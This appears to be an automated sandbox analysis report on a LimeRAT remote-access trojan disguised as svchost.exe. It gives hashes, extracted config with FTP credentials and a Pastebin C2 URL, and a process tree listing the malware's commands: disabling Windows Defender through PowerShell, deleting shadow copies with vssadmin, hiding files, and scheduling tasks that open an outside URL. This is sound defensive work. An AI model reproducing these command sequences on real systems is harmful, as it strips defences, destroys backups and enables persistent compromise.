Analysis

  • max time kernel
    194s
  • max time network
    196s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    19-06-2024 22:02

General

  • Target

    svchost.exe

  • Size

    242KB

  • MD5

    05e991bcf019b487f7ad4e896c77e988

  • SHA1

    f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a

  • SHA256

    cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196

  • SHA512

    4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3

  • SSDEEP

    6144:GpCE/UVPy/oCa+LDZWC9z5B0bmknq1difFN:6CzPygCa+DZ+nq1cT

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.encompossoftware.com
  • Port:
    21
  • Username:
    remoteuser
  • Password:
    Encomposx99

Extracted

Family

limerat

Wallets

False

Attributes
  • aes_key

    1

  • antivm

    false

  • c2_url

    https://pastebin.com/raw/GfV4LBjE

  • download_payload

    true

  • install

    true

  • install_name

    svchost.exe

  • main_folder

    False

  • payload_url

    True

  • pin_spread

    true

  • sub_folder

    False

  • usb_spread

    false

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 15 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Interacts with shadow copies 3 TTPs 12 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Modifies security service
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2324
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4228
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
        3⤵
        • Views/modifies file attributes
        PID:3852
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
        3⤵
        • Views/modifies file attributes
        PID:4672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2396
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4272
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3156
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5012
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4036
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3856
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin Delete Shadows /all /quiet
      2⤵
      PID:1876
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:4696
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
      2⤵
      PID:4164
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        3⤵
        PID:4472
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      2⤵
      PID:3216
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:2912
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3440
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:4132
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
      2⤵
      PID:2896
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:1248
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
      2⤵
      PID:1580
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:4936
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
      2⤵
      PID:3044
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:4984
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4576
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:1396
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
      2⤵
      PID:2056
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:4528
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
      2⤵
      PID:2988
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:4432
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:4972
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
      2⤵
      PID:1956
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:4248
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c Vssadmin delete shadowstorage /all /quiet
      2⤵
      PID:2404
      • C:\Windows\system32\vssadmin.exe
        Vssadmin delete shadowstorage /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1308
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /st "06:49" /sc daily /mo "5" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:6128
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /st "01:25" /sc daily /mo "3" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:5220
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /st "07:56" /sc daily /mo "3" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:5176
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /st "23:09" /sc weekly /mo "4" /d "Mon" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:5424
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /st "08:19" /sc monthly /m " jul" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4536
    • C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
      "C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"
      2⤵
      • Modifies visibility of file extensions in Explorer
      • Modifies visibility of hidden/system files in Explorer
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • System policy modification
      PID:2968
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        PID:4112
        • C:\Windows\system32\attrib.exe
          attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
          4⤵
          • Views/modifies file attributes
          PID:5956
        • C:\Windows\system32\attrib.exe
          attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
          4⤵
          • Views/modifies file attributes
          PID:1980
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:5492
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Drops file in Windows directory
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3560

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    ad5cd538ca58cb28ede39c108acb5785

    SHA1

    1ae910026f3dbe90ed025e9e96ead2b5399be877

    SHA256

    c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

    SHA512

    c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

    Filesize

    1KB

    MD5

    a9d9426944d7ee7cff4018213e207474

    SHA1

    e6a45f343e5181a5d44eccd5abd0a5e0d559ee29

    SHA256

    9d1fd0305bd35ac934cbcbfb7ded29505a255f77306994676d0b994e51dcdacb

    SHA512

    f3c4e6993baa914ef7fd0d93d8a4d82cf4b63df807634f810fd307d77341ffde80b0671c20fa0f84107aaf1ee00634488b877e200fcc1e66317bc05c9bc077a2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    326682587fa2a91cdce1a23343365924

    SHA1

    f3f9c4c753185c9ad8e65bbf3d3c027082b4ed5c

    SHA256

    c26a1262354d3eb74dc6da10db49ddcada09cf606f90f1ece7dba3332d090e20

    SHA512

    c6835c9e8de2676b92583cb7e96d3b64680f3e810d2b6dd7ce240b8c16c7c1060fd37a31df9f0afb8eed95dc7395a8c474f522407b77fd40aa15956b694c9f4c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    c176893209cde8007a0f5725480f95a2

    SHA1

    8c2af7640abb79e5f29af46f7ff5b57cb99a9d24

    SHA256

    36d94401b3d02935ed756b287003dbeb246dd6de6bb5f7075dbb2719f78efe6a

    SHA512

    5dfcd2f66add6fd2da9af9d2d2b91c1288d5428afc26d59405f930cbacf90c2a30ae68b9fe30237cf1b337903b911916cab7c2815437931c0b39061bc1192049

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    4be28fdfb37a676b93fad78b99d81211

    SHA1

    332072f199bce181ba74730b7d4d1072d2b0af19

    SHA256

    9e66684d79d4992d4fe387a5e3970545182a0ca52ecbf1b69cfbb537f5cedfa6

    SHA512

    69284ab872572813ff614b3c1fcf8738f14453b20066d91ed48b3051a406272031c2f5f6d70684480af746b07e7df1e113569ff21a17993bd9c577c2868198a3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    1251c52bf27855e59b1a121961ca2ab6

    SHA1

    9398fba66b322fd3ca99d6ad9476a06a46f92c41

    SHA256

    23f9fc9342bf8c5f567439b05b22533c15b8839e12612ecf782b42ad2b8f1c70

    SHA512

    cdd3a8fcd712893205efe86e7a30be64d37d7e04923a3a6042d87f4b0251a913bd77cdd7a729aaeece3050a7e7e88e275bb206f317cfabf02ad6409077016e63

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    42f854a16123a7207968a3690f6a3db7

    SHA1

    9bf2f4a63aeff9365f5a69cee28dfe769fd19bb4

    SHA256

    cdf414ceb304061e82bf6e0d70807a99307bc102851399e253850c0104b31e69

    SHA512

    558d194a5669a5df8f4ac6aadb36047c800ff773c4aa8bda107e268d4b58e261a703ad2a55e18acc8ba01de3391bd626b42fe794494aeb4ce03023f0a98d1bf4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    19c0976b6fb0de0eaa9c9e7b473064e1

    SHA1

    396be14e8cee53e7a631fc6dcda3aa2ec9b1b281

    SHA256

    b7ae4d869a394726856b59f24f2df0e643f9e0675ed89266ca9f881f1e21e17c

    SHA512

    889a95789d27cdb3bb706f54e7d19380e331fbaf2816f7d337a47b59017f63eabef515209993ffcfd199dd4d3c7221a24d67dd52da776a8bd542715c73c9e0c4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    2067ae57626e36223689ffecaba3b327

    SHA1

    0b2324ac98f9ede4932e3f8f560e03d4d1a1c8d7

    SHA256

    df7b47c1b102b6b5b0d020c46f45da8e9c595e9032d7d1cb4afd8bd7f61f4b19

    SHA512

    02f4894da5136eb13a18928d0502b9a98e3f2d7fc08434c302695d68da0a091c4b33d54ea4b091623ab5868bcfb9a5c5254ec3bade50bb445ac4e09fc7ad5a00

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    e41c231d56e1281192f5209de73222c5

    SHA1

    59f24fafe8d7555a53a42cfab048477153148eb5

    SHA256

    27da3e64fae9b82755a2c2f147bc5c25803540c8d744acf6e4ea45f315305da8

    SHA512

    2d37ef379bc0651ab65ac10a65da7805f26657f66e700ea569c59d583c6c5a55f9cc09b4f763e8d3cc288cd4ec2ce42ea12ccc7cbeb01cf64ad5cb87eb846a9f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    80bd89f3610176124e7363c4f0729015

    SHA1

    9b045d173660cf2ffff206eed7e6acc69e4b8357

    SHA256

    73b6ab0315f2dae879f62688b02aa4f76794f57bfb431e4f833fff4cf89264e6

    SHA512

    0db85b745f6c23c9432053f8a0833994df0b44bda3a1721667caeb817bceccfaf4692eed9272ad69aaa2d4de12400aef3de98eb4bcf0d462e20f5868b22d39ac

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f775aa93e7cb45bcdb8003aac41437d3

    SHA1

    1bb3c21d107d0f5902315f83616e94931620309c

    SHA256

    3abbe7cf798db495b11bcbabd8242a234bbf278cb46d44344d03352c85f3e34b

    SHA512

    1f2b388e1fa2accb9cb033803b45ddee21ab1cdf5198d05721b9916bc885af1feed59b7f9062860644388df99cbcc82d092a1f6efeb7534b309fb7639238e226

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c04c0cci.e4n.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

    Filesize

    242KB

    MD5

    05e991bcf019b487f7ad4e896c77e988

    SHA1

    f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a

    SHA256

    cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196

    SHA512

    4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3

  • memory/2324-566-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

    Filesize

    9.9MB

  • memory/2324-1-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp

    Filesize

    4KB

  • memory/2324-544-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp

    Filesize

    4KB

  • memory/2324-559-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

    Filesize

    9.9MB

  • memory/2324-2-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

    Filesize

    9.9MB

  • memory/2324-0-0x0000021B31B70000-0x0000021B31BB2000-memory.dmp

    Filesize

    264KB

  • memory/2968-575-0x0000021172130000-0x0000021172656000-memory.dmp

    Filesize

    5.1MB

  • memory/2968-574-0x00000211566B0000-0x00000211566CE000-memory.dmp

    Filesize

    120KB

  • memory/5016-9-0x000001C2D4DB0000-0x000001C2D4DD2000-memory.dmp

    Filesize

    136KB

  • memory/5016-7-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

    Filesize

    9.9MB

  • memory/5016-8-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

    Filesize

    9.9MB

  • memory/5016-11-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

    Filesize

    9.9MB

  • memory/5016-51-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

    Filesize

    9.9MB

  • memory/5016-14-0x000001C2D59C0000-0x000001C2D5A36000-memory.dmp

    Filesize

    472KB

  • memory/5016-43-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

    Filesize

    9.9MB